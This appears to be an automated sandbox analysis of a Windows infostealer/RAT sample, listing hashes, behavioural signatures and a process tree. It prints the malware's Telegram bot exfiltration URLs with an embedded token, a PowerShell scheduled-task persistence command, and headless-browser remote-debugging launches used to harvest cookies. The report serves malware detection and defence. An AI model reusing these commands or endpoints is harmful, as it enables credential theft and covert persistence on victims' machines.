Analysis
-
max time kernel
134s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20250314-en -
resource tags
arch:x64arch:x86image:win10v2004-20250314-enlocale:en-usos:windows10-2004-x64system -
submitted
03/04/2025, 10:37
Static task
static1
Behavioral task
behavioral1
Sample
2025-04-03_7cbfcf1b8eb95b00a52c8545858247f4_black-basta_hijackloader_luca-stealer.exe
Resource
win10v2004-20250314-en
General
-
Target
2025-04-03_7cbfcf1b8eb95b00a52c8545858247f4_black-basta_hijackloader_luca-stealer.exe
-
Size
5.7MB
-
MD5
7cbfcf1b8eb95b00a52c8545858247f4
-
SHA1
144a1e5ef70cc427c9eab0bdbe750029a8b1f311
-
SHA256
6a285a9511a2eea7d847566cfc5b5e2b79d1b8f173d134da7f90f8b6017d2f5d
-
SHA512
b6cb800865689d30ef598d3fc4f21fd838557448dc1b295a8cbdd1282c9b78e4ca120b4f8d27e6ca0194c6ec8c9255c565150e880834f2f9a8dc3001a24d4f68
-
SSDEEP
98304:Qf7l27OuKr+gvhf2U9Nzm31PMoslkqXf0FvUcwti78OqJ7TPBvc8X6Ucze:QiOuK6mn9NzgMoYkSIvUcwti7TQlvcid
Malware Config
Extracted
gurcu
https://api.telegram.org/bot7451084713:AAHkLbx1R49Iistq5zrYxQyAjPsaNq70hqk/sendDocument?chat_id=7848641603&caption=%F0%9F%93%82%20-%20Browser%20data%0A%E2%94%9C%E2%94%80%E2%94%80%20%F0%9F%93%82%20-%20cookies(2.83%20kb
https://api.telegram.org/bot7451084713:AAHkLbx1R49Iistq5zrYxQyAjPsaNq70hqk/sendMessage?chat_id=7848641603
https://api.telegram.org/bot7451084713:AAHkLbx1R49Iistq5zrYxQyAjPsaNq70hqk/getUpdates?offset=-
https://api.telegram.org/bot7451084713:AAHkLbx1R49Iistq5zrYxQyAjPsaNq70hqk/sendDocument?chat_id=7848641603&caption=%F0%9F%93%B8Screenshot%20take
Signatures
-
Gurcu family
-
MilleniumRat
MilleniumRat is a remote access trojan written in C#.
-
Milleniumrat family
-
Uses browser remote debugging 2 TTPs 10 IoCs
Can be used control the browser and steal sensitive information such as credentials and session cookies.
pid Process 5432 chrome.exe 5864 chrome.exe 5236 msedge.exe 4644 msedge.exe 4612 msedge.exe 2012 chrome.exe 3620 chrome.exe 5996 chrome.exe 1812 msedge.exe 5256 chrome.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000\Control Panel\International\Geo\Nation 2025-04-03_7cbfcf1b8eb95b00a52c8545858247f4_black-basta_hijackloader_luca-stealer.exe -
Executes dropped EXE 1 IoCs
pid Process 4728 Update.exe -
Loads dropped DLL 2 IoCs
pid Process 5016 2025-04-03_7cbfcf1b8eb95b00a52c8545858247f4_black-basta_hijackloader_luca-stealer.exe 4728 Update.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
pid Process 5556 powershell.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
flow ioc 7 raw.githubusercontent.com 9 raw.githubusercontent.com 31 raw.githubusercontent.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 2 ip-api.com -
Enumerates processes with tasklist 1 TTPs 1 IoCs
pid Process 4744 tasklist.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks processor information in registry 2 TTPs 4 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier chrome.exe Key opened \REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0 Update.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier Update.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 chrome.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 4752 timeout.exe -
Enumerates system info in registry 2 TTPs 6 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe -
Modifies data under HKEY_USERS 2 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry chrome.exe Set value (int) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133881502472356985" chrome.exe -
Suspicious behavior: EnumeratesProcesses 53 IoCs
pid Process 5016 2025-04-03_7cbfcf1b8eb95b00a52c8545858247f4_black-basta_hijackloader_luca-stealer.exe 5016 2025-04-03_7cbfcf1b8eb95b00a52c8545858247f4_black-basta_hijackloader_luca-stealer.exe 5016 2025-04-03_7cbfcf1b8eb95b00a52c8545858247f4_black-basta_hijackloader_luca-stealer.exe 5016 2025-04-03_7cbfcf1b8eb95b00a52c8545858247f4_black-basta_hijackloader_luca-stealer.exe 5016 2025-04-03_7cbfcf1b8eb95b00a52c8545858247f4_black-basta_hijackloader_luca-stealer.exe 5016 2025-04-03_7cbfcf1b8eb95b00a52c8545858247f4_black-basta_hijackloader_luca-stealer.exe 5016 2025-04-03_7cbfcf1b8eb95b00a52c8545858247f4_black-basta_hijackloader_luca-stealer.exe 5016 2025-04-03_7cbfcf1b8eb95b00a52c8545858247f4_black-basta_hijackloader_luca-stealer.exe 5016 2025-04-03_7cbfcf1b8eb95b00a52c8545858247f4_black-basta_hijackloader_luca-stealer.exe 5016 2025-04-03_7cbfcf1b8eb95b00a52c8545858247f4_black-basta_hijackloader_luca-stealer.exe 5016 2025-04-03_7cbfcf1b8eb95b00a52c8545858247f4_black-basta_hijackloader_luca-stealer.exe 5016 2025-04-03_7cbfcf1b8eb95b00a52c8545858247f4_black-basta_hijackloader_luca-stealer.exe 5016 2025-04-03_7cbfcf1b8eb95b00a52c8545858247f4_black-basta_hijackloader_luca-stealer.exe 5016 2025-04-03_7cbfcf1b8eb95b00a52c8545858247f4_black-basta_hijackloader_luca-stealer.exe 5016 2025-04-03_7cbfcf1b8eb95b00a52c8545858247f4_black-basta_hijackloader_luca-stealer.exe 5016 2025-04-03_7cbfcf1b8eb95b00a52c8545858247f4_black-basta_hijackloader_luca-stealer.exe 5016 2025-04-03_7cbfcf1b8eb95b00a52c8545858247f4_black-basta_hijackloader_luca-stealer.exe 5016 2025-04-03_7cbfcf1b8eb95b00a52c8545858247f4_black-basta_hijackloader_luca-stealer.exe 5016 2025-04-03_7cbfcf1b8eb95b00a52c8545858247f4_black-basta_hijackloader_luca-stealer.exe 5016 2025-04-03_7cbfcf1b8eb95b00a52c8545858247f4_black-basta_hijackloader_luca-stealer.exe 5016 2025-04-03_7cbfcf1b8eb95b00a52c8545858247f4_black-basta_hijackloader_luca-stealer.exe 5016 2025-04-03_7cbfcf1b8eb95b00a52c8545858247f4_black-basta_hijackloader_luca-stealer.exe 5016 2025-04-03_7cbfcf1b8eb95b00a52c8545858247f4_black-basta_hijackloader_luca-stealer.exe 4728 Update.exe 4728 Update.exe 4728 Update.exe 4728 Update.exe 4728 Update.exe 4728 Update.exe 4728 Update.exe 4728 Update.exe 4728 Update.exe 4728 Update.exe 4728 Update.exe 4728 Update.exe 4728 Update.exe 4728 Update.exe 4728 Update.exe 4728 Update.exe 4728 Update.exe 4728 Update.exe 4728 Update.exe 4728 Update.exe 4728 Update.exe 4728 Update.exe 4728 Update.exe 5556 powershell.exe 5556 powershell.exe 4728 Update.exe 5256 chrome.exe 5256 chrome.exe 4728 Update.exe 4728 Update.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 8 IoCs
pid Process 5256 chrome.exe 5256 chrome.exe 5256 chrome.exe 5256 chrome.exe 5256 chrome.exe 5236 msedge.exe 5236 msedge.exe 5236 msedge.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 5016 2025-04-03_7cbfcf1b8eb95b00a52c8545858247f4_black-basta_hijackloader_luca-stealer.exe Token: SeDebugPrivilege 4744 tasklist.exe Token: SeDebugPrivilege 4728 Update.exe Token: SeDebugPrivilege 5556 powershell.exe Token: SeIncreaseQuotaPrivilege 5556 powershell.exe Token: SeSecurityPrivilege 5556 powershell.exe Token: SeTakeOwnershipPrivilege 5556 powershell.exe Token: SeLoadDriverPrivilege 5556 powershell.exe Token: SeSystemProfilePrivilege 5556 powershell.exe Token: SeSystemtimePrivilege 5556 powershell.exe Token: SeProfSingleProcessPrivilege 5556 powershell.exe Token: SeIncBasePriorityPrivilege 5556 powershell.exe Token: SeCreatePagefilePrivilege 5556 powershell.exe Token: SeBackupPrivilege 5556 powershell.exe Token: SeRestorePrivilege 5556 powershell.exe Token: SeShutdownPrivilege 5556 powershell.exe Token: SeDebugPrivilege 5556 powershell.exe Token: SeSystemEnvironmentPrivilege 5556 powershell.exe Token: SeRemoteShutdownPrivilege 5556 powershell.exe Token: SeUndockPrivilege 5556 powershell.exe Token: SeManageVolumePrivilege 5556 powershell.exe Token: 33 5556 powershell.exe Token: 34 5556 powershell.exe Token: 35 5556 powershell.exe Token: 36 5556 powershell.exe Token: SeIncreaseQuotaPrivilege 5556 powershell.exe Token: SeSecurityPrivilege 5556 powershell.exe Token: SeTakeOwnershipPrivilege 5556 powershell.exe Token: SeLoadDriverPrivilege 5556 powershell.exe Token: SeSystemProfilePrivilege 5556 powershell.exe Token: SeSystemtimePrivilege 5556 powershell.exe Token: SeProfSingleProcessPrivilege 5556 powershell.exe Token: SeIncBasePriorityPrivilege 5556 powershell.exe Token: SeCreatePagefilePrivilege 5556 powershell.exe Token: SeBackupPrivilege 5556 powershell.exe Token: SeRestorePrivilege 5556 powershell.exe Token: SeShutdownPrivilege 5556 powershell.exe Token: SeDebugPrivilege 5556 powershell.exe Token: SeSystemEnvironmentPrivilege 5556 powershell.exe Token: SeRemoteShutdownPrivilege 5556 powershell.exe Token: SeUndockPrivilege 5556 powershell.exe Token: SeManageVolumePrivilege 5556 powershell.exe Token: 33 5556 powershell.exe Token: 34 5556 powershell.exe Token: 35 5556 powershell.exe Token: 36 5556 powershell.exe Token: SeIncreaseQuotaPrivilege 5556 powershell.exe Token: SeSecurityPrivilege 5556 powershell.exe Token: SeTakeOwnershipPrivilege 5556 powershell.exe Token: SeLoadDriverPrivilege 5556 powershell.exe Token: SeSystemProfilePrivilege 5556 powershell.exe Token: SeSystemtimePrivilege 5556 powershell.exe Token: SeProfSingleProcessPrivilege 5556 powershell.exe Token: SeIncBasePriorityPrivilege 5556 powershell.exe Token: SeCreatePagefilePrivilege 5556 powershell.exe Token: SeBackupPrivilege 5556 powershell.exe Token: SeRestorePrivilege 5556 powershell.exe Token: SeShutdownPrivilege 5556 powershell.exe Token: SeDebugPrivilege 5556 powershell.exe Token: SeSystemEnvironmentPrivilege 5556 powershell.exe Token: SeRemoteShutdownPrivilege 5556 powershell.exe Token: SeUndockPrivilege 5556 powershell.exe Token: SeManageVolumePrivilege 5556 powershell.exe Token: 33 5556 powershell.exe -
Suspicious use of FindShellTrayWindow 2 IoCs
pid Process 5256 chrome.exe 5236 msedge.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 4728 Update.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 5016 wrote to memory of 3356 5016 2025-04-03_7cbfcf1b8eb95b00a52c8545858247f4_black-basta_hijackloader_luca-stealer.exe 93 PID 5016 wrote to memory of 3356 5016 2025-04-03_7cbfcf1b8eb95b00a52c8545858247f4_black-basta_hijackloader_luca-stealer.exe 93 PID 3356 wrote to memory of 4184 3356 cmd.exe 95 PID 3356 wrote to memory of 4184 3356 cmd.exe 95 PID 3356 wrote to memory of 4744 3356 cmd.exe 96 PID 3356 wrote to memory of 4744 3356 cmd.exe 96 PID 3356 wrote to memory of 4796 3356 cmd.exe 97 PID 3356 wrote to memory of 4796 3356 cmd.exe 97 PID 3356 wrote to memory of 4752 3356 cmd.exe 98 PID 3356 wrote to memory of 4752 3356 cmd.exe 98 PID 3356 wrote to memory of 4728 3356 cmd.exe 99 PID 3356 wrote to memory of 4728 3356 cmd.exe 99 PID 4728 wrote to memory of 5556 4728 Update.exe 101 PID 4728 wrote to memory of 5556 4728 Update.exe 101 PID 4728 wrote to memory of 5256 4728 Update.exe 103 PID 4728 wrote to memory of 5256 4728 Update.exe 103 PID 5256 wrote to memory of 5860 5256 chrome.exe 104 PID 5256 wrote to memory of 5860 5256 chrome.exe 104 PID 5256 wrote to memory of 1400 5256 chrome.exe 106 PID 5256 wrote to memory of 1400 5256 chrome.exe 106 PID 5256 wrote to memory of 5168 5256 chrome.exe 107 PID 5256 wrote to memory of 5168 5256 chrome.exe 107 PID 5256 wrote to memory of 1400 5256 chrome.exe 106 PID 5256 wrote to memory of 1400 5256 chrome.exe 106 PID 5256 wrote to memory of 1400 5256 chrome.exe 106 PID 5256 wrote to memory of 1400 5256 chrome.exe 106 PID 5256 wrote to memory of 1400 5256 chrome.exe 106 PID 5256 wrote to memory of 1400 5256 chrome.exe 106 PID 5256 wrote to memory of 1400 5256 chrome.exe 106 PID 5256 wrote to memory of 1400 5256 chrome.exe 106 PID 5256 wrote to memory of 1400 5256 chrome.exe 106 PID 5256 wrote to memory of 1400 5256 chrome.exe 106 PID 5256 wrote to memory of 1400 5256 chrome.exe 106 PID 5256 wrote to memory of 1400 5256 chrome.exe 106 PID 5256 wrote to memory of 1400 5256 chrome.exe 106 PID 5256 wrote to memory of 1400 5256 chrome.exe 106 PID 5256 wrote to memory of 1400 5256 chrome.exe 106 PID 5256 wrote to memory of 1400 5256 chrome.exe 106 PID 5256 wrote to memory of 1400 5256 chrome.exe 106 PID 5256 wrote to memory of 1400 5256 chrome.exe 106 PID 5256 wrote to memory of 1400 5256 chrome.exe 106 PID 5256 wrote to memory of 1400 5256 chrome.exe 106 PID 5256 wrote to memory of 1400 5256 chrome.exe 106 PID 5256 wrote to memory of 1400 5256 chrome.exe 106 PID 5256 wrote to memory of 1400 5256 chrome.exe 106 PID 5256 wrote to memory of 1400 5256 chrome.exe 106 PID 5256 wrote to memory of 1400 5256 chrome.exe 106 PID 5256 wrote to memory of 1400 5256 chrome.exe 106 PID 5256 wrote to memory of 1400 5256 chrome.exe 106 PID 5256 wrote to memory of 1400 5256 chrome.exe 106 PID 5256 wrote to memory of 3640 5256 chrome.exe 108 PID 5256 wrote to memory of 3640 5256 chrome.exe 108 PID 5256 wrote to memory of 3640 5256 chrome.exe 108 PID 5256 wrote to memory of 3640 5256 chrome.exe 108 PID 5256 wrote to memory of 3640 5256 chrome.exe 108 PID 5256 wrote to memory of 3640 5256 chrome.exe 108 PID 5256 wrote to memory of 3640 5256 chrome.exe 108 PID 5256 wrote to memory of 3640 5256 chrome.exe 108 PID 5256 wrote to memory of 3640 5256 chrome.exe 108 PID 5256 wrote to memory of 3640 5256 chrome.exe 108 PID 5256 wrote to memory of 3640 5256 chrome.exe 108 PID 5256 wrote to memory of 3640 5256 chrome.exe 108 PID 5256 wrote to memory of 3640 5256 chrome.exe 108 PID 5256 wrote to memory of 3640 5256 chrome.exe 108
Processes
-
C:\Users\Admin\AppData\Local\Temp\2025-04-03_7cbfcf1b8eb95b00a52c8545858247f4_black-basta_hijackloader_luca-stealer.exe"C:\Users\Admin\AppData\Local\Temp\2025-04-03_7cbfcf1b8eb95b00a52c8545858247f4_black-basta_hijackloader_luca-stealer.exe"1⤵
- Checks computer location settings
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:5016 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\tmp67A3.tmp.bat & Del C:\Users\Admin\AppData\Local\Temp\tmp67A3.tmp.bat2⤵
- Suspicious use of WriteProcessMemory
PID:3356 -
C:\Windows\system32\chcp.comchcp 650013⤵PID:4184
-
-
C:\Windows\system32\tasklist.exeTasklist /fi "PID eq 5016"3⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:4744
-
-
C:\Windows\system32\find.exefind ":"3⤵PID:4796
-
-
C:\Windows\system32\timeout.exeTimeout /T 1 /Nobreak3⤵
- Delays execution with timeout.exe
PID:4752
-
-
C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLog\Update.exe"C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLog\Update.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4728 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command " $taskName = 'ChromeUpdate'; $exePath = 'C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLog\Update.exe'; $action = New-ScheduledTaskAction -Execute $exePath; $trigger = New-ScheduledTaskTrigger -AtLogOn; $principal = New-ScheduledTaskPrincipal -UserId "SYSTEM" -RunLevel Highest; $settings = New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries; $task = New-ScheduledTask -Action $action -Principal $principal -Trigger $trigger -Settings $settings; Register-ScheduledTask -TaskName $taskName -InputObject $task -Force"4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5556
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --profile-directory="Default" --headless --disable-gpu4⤵
- Uses browser remote debugging
- Checks processor information in registry
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:5256 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0x10c,0x110,0x114,0xe8,0x118,0x7ffa4f7fdcf8,0x7ffa4f7fdd04,0x7ffa4f7fdd105⤵PID:5860
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --headless --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAAAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --use-gl=angle --use-angle=swiftshader-webgl --field-trial-handle=2004,i,11455991698054913338,4342502725163525034,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=1992 /prefetch:25⤵PID:1400
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --field-trial-handle=2124,i,11455991698054913338,4342502725163525034,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2120 /prefetch:35⤵PID:5168
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --field-trial-handle=2476,i,11455991698054913338,4342502725163525034,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2312 /prefetch:85⤵PID:3640
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9222 --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3088,i,11455991698054913338,4342502725163525034,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=3084 /prefetch:15⤵
- Uses browser remote debugging
PID:3620
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9222 --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3112,i,11455991698054913338,4342502725163525034,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=3108 /prefetch:15⤵
- Uses browser remote debugging
PID:2012
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --extension-process --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9222 --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4156,i,11455991698054913338,4342502725163525034,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=4152 /prefetch:25⤵
- Uses browser remote debugging
PID:5432
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9222 --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4640,i,11455991698054913338,4342502725163525034,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=4636 /prefetch:15⤵
- Uses browser remote debugging
PID:5996
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --field-trial-handle=5332,i,11455991698054913338,4342502725163525034,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5328 /prefetch:85⤵PID:5676
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --field-trial-handle=5452,i,11455991698054913338,4342502725163525034,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5448 /prefetch:85⤵PID:3524
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --field-trial-handle=5596,i,11455991698054913338,4342502725163525034,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5328 /prefetch:85⤵PID:5596
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --field-trial-handle=5728,i,11455991698054913338,4342502725163525034,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5716 /prefetch:85⤵PID:3008
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --field-trial-handle=5712,i,11455991698054913338,4342502725163525034,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5704 /prefetch:85⤵PID:5480
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --field-trial-handle=5740,i,11455991698054913338,4342502725163525034,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5748 /prefetch:85⤵PID:1992
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9222 --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --field-trial-handle=5884,i,11455991698054913338,4342502725163525034,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=6000 /prefetch:15⤵
- Uses browser remote debugging
PID:5864
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9222 --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --profile-directory="Default" --headless --disable-gpu4⤵
- Uses browser remote debugging
- Enumerates system info in registry
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
PID:5236 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x248,0x24c,0x250,0x244,0x274,0x7ffa4cf4f208,0x7ffa4cf4f214,0x7ffa4cf4f2205⤵PID:2204
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --headless --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAAAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --use-gl=angle --use-angle=swiftshader-webgl --always-read-main-dll --field-trial-handle=2212,i,16339685131422486527,13678934012158994883,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=2196 /prefetch:25⤵PID:4532
-
-
